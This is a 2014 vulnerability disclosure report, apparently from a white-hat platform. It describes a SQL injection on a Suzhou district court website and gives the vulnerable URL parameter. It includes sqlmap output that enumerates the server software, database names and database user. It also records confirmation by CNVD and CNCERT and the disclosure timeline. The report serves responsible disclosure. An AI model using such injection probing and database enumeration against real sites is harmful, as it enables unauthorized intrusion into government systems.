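2014-06-07: Details reported to the vendor; awaiting vendor handling
2014-06-12: Vendor confirmed; details disclosed to the vendor only
2014-06-22: Details disclosed to core white hats and experts in related fields
2014-07-02: Details disclosed to regular white hats
2014-07-12: Details disclosed to intern white hats
2014-07-23: Details disclosed to the public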
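A government website in Suzhou has a SQL injection vulnerability. Nothing technically sophisticated, just a friendly check.
The website of the Suzhou Wuzhong District People's Court has a SQL injection; the affected URL is: http://www.szwzfy.gov.cn/fglt_show.php?id=37
I ran sqlmap against it briefly and did not dare go any deeper.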
[11:20:11] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 6.5
web application technology: Apache 2.2.15, PHP 5.3.15
back-end DBMS: MySQL 5.0.11
[11:20:11] [INFO] fetching database names
[11:20:12] [INFO] the SQL query used returns 2 entries
[11:20:12] [INFO] retrieved: "information_schema"
[11:20:12] [INFO] retrieved: "wzfyw0905"
available databases [2]:
[*] information_schema
[*] wzfyw0905

[11:20:58] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 6.5
web application technology: Apache 2.2.15, PHP 5.3.15
back-end DBMS: MySQL 5.0.11
[11:20:58] [INFO] fetching database users
[11:20:58] [INFO] the SQL query used returns 1 entries
[11:20:58] [INFO] retrieved: "'wzfyw0905'@'localhost'"
database management system users [1]:
[*] 'wzfyw0905'@'localhost'
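Handle it as you see fit.
Severity: Medium
Vulnerability Rank: 10
Confirmed: 2014-06-12 08:32
CNVD confirmed and reproduced the situation described, and it has been passed on via CNCERT to the Jiangsu sub-center for handling.
None yet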